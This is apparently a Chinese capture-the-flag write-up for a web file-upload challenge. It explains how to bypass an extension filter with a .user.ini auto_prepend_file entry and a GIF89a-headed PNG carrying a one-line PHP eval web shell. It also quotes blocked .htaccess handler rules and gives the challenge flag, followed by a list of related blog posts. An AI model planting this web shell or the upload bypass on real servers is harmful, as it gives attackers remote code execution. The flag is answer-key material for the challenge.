攻防世界-Web-easyupload

知识点

1.user.int绕过限制

步骤

1.直接抓包,先测是上传限制。(上传png等文件时记得加上GIF89a文件头)

php文件被禁止上传,尝试上传.htaccess文件,用来解析png文件中的php代码,结果发现.htaccess中的内容被限制了。如下内容:

复制代码
方法一:
<FilesMatch "4.png">
SetHandler application/x-httpd-php
</FilesMatch>
 
方法二:
AddType application/x-httpd-php .png

在此处需要使用.user.ini,这个文件的作用和.htaccess差不多,都是使一个文件能够被执行。

.user.ini文件内容:(使1.png能够被当做php执行)

复制代码
GIF89a
auto_prepend_file=1.png

然后再上传png文件,里面写上一句话木马,这里上传png文件时,不能包含php字样,所以采用另外一种一句话木马

1.png文件内容:(注意这里不要有空格不然会连接不上)

复制代码
GIF89a
<?=eval($_POST['cmd']);?>

2.连接

flag:cyberpeace{1b4d400f5bdf7e215a443886721a1fab}

相关推荐
XINVRY-FPGA12 分钟前
XCKU035-2FBVA676I AMD Xilinx Kintex UltraScale FPGA
arm开发·嵌入式硬件·网络安全·fpga开发·硬件工程·信号处理·fpga
utmhikari28 分钟前
【AI原生】用Vibe Coding写产品前端原型的一些经验
前端·ai·产品经理·web·web开发·ai-native·qoder
网络研究院38 分钟前
中国网络安全与数据保护领域政策与执法动态回顾(2026年3月)
网络安全·数据保护·法规·政策·回顾
HackTwoHub1 小时前
WEB扫描器Invicti-Professional-V26.50.0(自动化爬虫扫描)更新
前端·人工智能·chrome·爬虫·web安全·网络安全·自动化
humors2211 小时前
六位数字密码表示
安全·网络安全·密码学
68岁扶墙肾透2 小时前
Edu实战-某高校信息系统代码审计
安全·web安全·网络安全·php
网络研究院2 小时前
中国网络安全与数据保护领域政策与执法动态回顾(2026年5月)
网络安全·数据保护·执法·政策·回顾
llz_11212 小时前
web-第三次课后作业
前端·后端·web
以太浮标17 小时前
华为eNSP模拟器综合实验之- 路由黑洞场景解析及实验
运维·网络·网络协议·网络安全·华为·智能路由器·信息与通信
SmileAndFun19 小时前
收到安全通报后,如何划分责任做存证溯源?
安全·网络安全·渗透测试·等保测评·溯源取证·监管通报·电子存证